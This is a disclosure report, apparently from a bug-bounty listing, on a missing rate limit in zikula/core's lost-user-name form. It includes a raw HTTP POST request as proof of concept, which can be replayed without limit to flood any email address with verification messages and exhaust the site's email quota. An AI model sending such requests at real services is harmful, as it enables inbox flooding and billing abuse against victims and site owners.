Insufficient Granularity of Access Control in zikula/core
Sep 18th 2021
Rate limit bypass sent unlimited email victim or any email address
Proof of Concept
There is no rate limit lost-user-name, attacker to send unlimited email to victim or any email address.
POST /zauth/account/lost-user-name Host: demo.ziku.la User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 222 Origin: https://demo.ziku.la Connection: close Referer: https://demo.ziku.la/zauth/account/lost-user-name Cookie: _zsid=1kkpnmtra80thcmftq7i4ots3d Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 zikulazauthmodule_account_lostusername%5Bemail%5D=aravindtestx%40gmail.com
email= parameter value to victim mail. this request unlimited time and victim email address will received unlimited verification email .
Attacker can sent unlimited email to any mail address . Many email service provider has limited email sending like 1000 email per month . If you exceed that limit then you will be extra charged . So, using this attack attacker can exceed that limit and company will be charged extra money.